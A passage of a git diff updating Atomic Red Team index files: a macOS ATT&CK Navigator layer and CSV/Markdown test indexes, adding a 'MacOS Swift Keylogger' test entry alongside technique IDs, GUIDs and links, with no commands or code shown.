Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (macOS)","versions":{"attack":"10","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["macOS"]},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1090.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 1fee90bc..cccc6afd 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -781,6 +781,7 @@ collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4 collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh +collection,T1056.001,Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell @@ -835,6 +836,7 @@ credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh +credential-access,T1056.001,Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 8d2df606..29aec657 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv @@ -66,6 +66,7 @@ collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash +collection,T1056.001,Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash @@ -113,6 +114,7 @@ privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1 privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh privilege-escalation,T1078.003,Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash +credential-access,T1056.001,Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 2d3c60cf..1058901e 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1354,6 +1354,7 @@ - Atomic Test #4: Bash session based keylogger [linux] - Atomic Test #5: SSHD PAM keylogger [linux] - Atomic Test #6: Auditd keylogger [linux] + - Atomic Test #7: MacOS Swift Keylogger 